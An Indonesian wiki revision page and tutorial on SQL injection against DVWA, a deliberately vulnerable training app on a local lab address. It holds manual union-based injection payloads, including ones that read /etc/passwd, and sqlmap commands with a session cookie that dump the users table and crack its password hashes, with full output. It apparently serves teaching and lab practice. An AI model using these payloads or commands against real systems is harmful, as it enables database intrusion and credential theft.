Difference between revisions of "SQLMap: Contoh SQL Injection ke DVWA"
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
(5 intermediate revisions by the same user not shown) | |||
Line 7: | Line 7: | ||
==Proses manual untuk test Vulnerability== | ==Proses manual untuk test Vulnerability== | ||
+ | |||
+ | Dalam DVWA | ||
+ | |||
+ | Original Query | ||
+ | |||
+ | SELECT first_name, last_name FROM users WHERE user_ID = '$id' | ||
+ | |||
+ | Exploited Query | ||
+ | |||
+ | SELECT first_name, last_name FROM users WHERE user_ID = '' union select user, password from dvwa.users -- ' | ||
+ | |||
+ | |||
+ | |||
Cek apakah situs kita vulnerable | Cek apakah situs kita vulnerable | ||
Line 36: | Line 49: | ||
Kita tahu bahwa 1,2,3 akan memberikan kita error kumpulan data hanya ada 2 kolom. | Kita tahu bahwa 1,2,3 akan memberikan kita error kumpulan data hanya ada 2 kolom. | ||
+ | ==Menggunakan SQLMAP== | ||
+ | Parameter yang kita gunakan & artinya | ||
− | == | + | -u URL yang dituju |
+ | --cookie mengirimkan / mengemulasi sebuah cookie header | ||
+ | |||
+ | Untuk memperoleh cookie, kita perlu mendapatkannya misalnya dengan firefox addon tamper data. Contoh | ||
+ | |||
+ | Cookie=security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7 | ||
+ | |||
+ | --dbs Ini akan memberikan daftar database jika sukses dilakukan. | ||
+ | -D Ini untuk menentukan database yang diserang. | ||
+ | --tables untuk melihat daftar tabel dari database -D parm. | ||
+ | --columns untuk melihat kolom di -tables parm | ||
+ | --current-user untuk melihat current user yang menjalankan SQL | ||
+ | --users untuk melihat semua users dari SQL | ||
+ | --passwords untuk memberikan password yang di hash dari SQL instance. | ||
+ | |||
+ | ==Contoh Eksekusi== | ||
+ | |||
+ | ===Cek daftar database yang ada=== | ||
+ | |||
+ | sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' | ||
+ | --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" --dbs | ||
+ | |||
+ | hasilnya | ||
+ | |||
+ | [07:02:08] [INFO] fetching database names | ||
+ | available databases [7]: | ||
+ | [*] dvwa | ||
+ | [*] information_schema | ||
+ | [*] mediawiki | ||
+ | [*] moodle | ||
+ | [*] mysql | ||
+ | [*] performance_schema | ||
+ | [*] snort | ||
+ | |||
+ | ===Cek daftar tabel dari database dvwa=== | ||
− | + | sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' | |
+ | --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa --tables | ||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | Hasilnya | |
− | + | [07:08:39] [INFO] fetching tables for database: 'dvwa' | |
+ | [07:08:39] [WARNING] reflective value(s) found and filtering out | ||
+ | Database: dvwa | ||
+ | [2 tables] | ||
+ | +-----------+ | ||
+ | | guestbook | | ||
+ | | users | | ||
+ | +-----------+ | ||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | ===Cek format kolom tabel users=== | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' | |
− | + | --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa -T users --columns | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | sqlmap -u | ||
− | + | Hasilnya | |
− | + | [07:11:51] [INFO] fetching columns for table 'users' in database 'dvwa' | |
+ | [07:11:51] [WARNING] reflective value(s) found and filtering out | ||
+ | Database: dvwa | ||
+ | Table: users | ||
+ | [6 columns] | ||
+ | +------------+-------------+ | ||
+ | | Column | Type | | ||
+ | +------------+-------------+ | ||
+ | | user | varchar(15) | | ||
+ | | avatar | varchar(70) | | ||
+ | | first_name | varchar(15) | | ||
+ | | last_name | varchar(15) | | ||
+ | | password | varchar(32) | | ||
+ | | user_id | int(6) | | ||
+ | +------------+-------------+ | ||
− | + | ===dump password=== | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
+ | sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' | ||
+ | --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa -T users --dump | ||
+ | --dump akan meng-crack password yang di hash. Anda akan ditanya apakah akan menggunakan dictionary yang ada di SQLMAP atau dictionary kita sendiri. | ||
+ | Hasilnya | ||
+ | [07:15:16] [INFO] using hash method 'md5_generic_passwd' | ||
+ | what dictionary do you want to use? | ||
+ | [1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter) | ||
+ | [2] custom dictionary file | ||
+ | [3] file with list of dictionary files | ||
+ | > 1 | ||
+ | [07:15:21] [INFO] using default dictionary | ||
+ | do you want to use common password suffixes? (slow!) [y/N] y | ||
+ | [07:15:30] [INFO] starting dictionary-based cracking (md5_generic_passwd) | ||
+ | [07:15:30] [INFO] starting 2 processes | ||
+ | [07:15:35] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03' | ||
+ | [07:15:42] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b' | ||
+ | [07:15:50] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7' | ||
+ | [07:15:54] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99' | ||
+ | [07:16:00] [INFO] postprocessing table dump | ||
+ | Database: dvwa | ||
+ | Table: users | ||
+ | [5 entries] | ||
+ | +---------+---------+---------------------------------+---------------------------------------------+-----------+------------+ | ||
+ | | user_id | user | avatar | password | last_name | first_name | | ||
+ | +---------+---------+---------------------------------+---------------------------------------------+-----------+------------+ | ||
+ | | 1 | admin | dvwa/hackable/users/admin.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | | ||
+ | | 2 | gordonb | dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | | ||
+ | | 3 | 1337 | dvwa/hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | | ||
+ | | 4 | pablo | dvwa/hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | | ||
+ | | 5 | smithy | dvwa/hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | | ||
+ | +---------+---------+---------------------------------+---------------------------------------------+-----------+------------+ | ||
+ | Maka kita memperoleh password dari semua sql user :) | ||
==Referensi== | ==Referensi== | ||
* http://www.null-reference.com/linux/sqlmap-with-dvwa-damn-vunerable-web-app/ | * http://www.null-reference.com/linux/sqlmap-with-dvwa-damn-vunerable-web-app/ |
Latest revision as of 05:56, 4 March 2017
Sumber: http://www.null-reference.com/linux/sqlmap-with-dvwa-damn-vunerable-web-app/
Latar Belakang
Sebelum menggunakan SQLMAP akan sangat baik jika kita dapat melihat apakah injection dapat dilakukan. SQLMAP hanya alat bantu saja, sebaiknya kita mengetahui proses-nya secara manual. Semua SQLMAP fitur dapat dilakukan secara manual.
Proses manual untuk test Vulnerability
Dalam DVWA
Original Query
SELECT first_name, last_name FROM users WHERE user_ID = '$id'
Exploited Query
SELECT first_name, last_name FROM users WHERE user_ID = union select user, password from dvwa.users -- '
Cek apakah situs kita vulnerable
1′ or ’2′=’2
Kita perlu melihat berapa banyak kolom sebelum ada error.
‘ and 1=1 union select 1,2 # ‘ and 1=1 union select 1,2,3 #
Ini akan memperlihatkan bahwa tabel-nya hanya ada 2 kolom.
Mari kita melakukan injection.
‘ union SELECT 1, user() — ‘ ‘ and 1=1 union select database(),version() # ‘ union SELECT 1, user() # ‘ and 1=1 union select null,table_schema from information_schema.tables # ‘ and 1=1 union select table_name,table_schema from information_schema.tables # ‘ and 1=1 union select table_name,table_schema from information_schema.tables where table_schema=’dvwa’ # ‘ and 1=1 union select first_name,password from dvwa.users # ‘ union SELECT table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ # ‘ union SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘user_id’ # ‘ union select user, password FROM users # ‘ union SELECT 1, load_file(‘/etc/hosts’) # ‘ union SELECT 1, load_file(‘/etc/passwd’) #
Kita tahu bahwa 1,2,3 akan memberikan kita error kumpulan data hanya ada 2 kolom.
Menggunakan SQLMAP
Parameter yang kita gunakan & artinya
-u URL yang dituju --cookie mengirimkan / mengemulasi sebuah cookie header
Untuk memperoleh cookie, kita perlu mendapatkannya misalnya dengan firefox addon tamper data. Contoh
Cookie=security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7
--dbs Ini akan memberikan daftar database jika sukses dilakukan. -D Ini untuk menentukan database yang diserang. --tables untuk melihat daftar tabel dari database -D parm. --columns untuk melihat kolom di -tables parm --current-user untuk melihat current user yang menjalankan SQL --users untuk melihat semua users dari SQL --passwords untuk memberikan password yang di hash dari SQL instance.
Contoh Eksekusi
Cek daftar database yang ada
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" --dbs
hasilnya
[07:02:08] [INFO] fetching database names available databases [7]: [*] dvwa [*] information_schema [*] mediawiki [*] moodle [*] mysql [*] performance_schema [*] snort
Cek daftar tabel dari database dvwa
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa --tables
Hasilnya
[07:08:39] [INFO] fetching tables for database: 'dvwa' [07:08:39] [WARNING] reflective value(s) found and filtering out Database: dvwa [2 tables] +-----------+ | guestbook | | users | +-----------+
Cek format kolom tabel users
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa -T users --columns
Hasilnya
[07:11:51] [INFO] fetching columns for table 'users' in database 'dvwa' [07:11:51] [WARNING] reflective value(s) found and filtering out Database: dvwa Table: users [6 columns] +------------+-------------+ | Column | Type | +------------+-------------+ | user | varchar(15) | | avatar | varchar(70) | | first_name | varchar(15) | | last_name | varchar(15) | | password | varchar(32) | | user_id | int(6) | +------------+-------------+
dump password
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa -T users --dump
--dump akan meng-crack password yang di hash. Anda akan ditanya apakah akan menggunakan dictionary yang ada di SQLMAP atau dictionary kita sendiri.
Hasilnya
[07:15:16] [INFO] using hash method 'md5_generic_passwd' what dictionary do you want to use? [1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > 1 [07:15:21] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] y [07:15:30] [INFO] starting dictionary-based cracking (md5_generic_passwd) [07:15:30] [INFO] starting 2 processes [07:15:35] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03' [07:15:42] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b' [07:15:50] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7' [07:15:54] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99' [07:16:00] [INFO] postprocessing table dump Database: dvwa Table: users [5 entries] +---------+---------+---------------------------------+---------------------------------------------+-----------+------------+ | user_id | user | avatar | password | last_name | first_name | +---------+---------+---------------------------------+---------------------------------------------+-----------+------------+ | 1 | admin | dvwa/hackable/users/admin.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | | 2 | gordonb | dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | | 3 | 1337 | dvwa/hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | | 4 | pablo | dvwa/hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | | 5 | smithy | dvwa/hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | +---------+---------+---------------------------------+---------------------------------------------+-----------+------------+
Maka kita memperoleh password dari semua sql user :)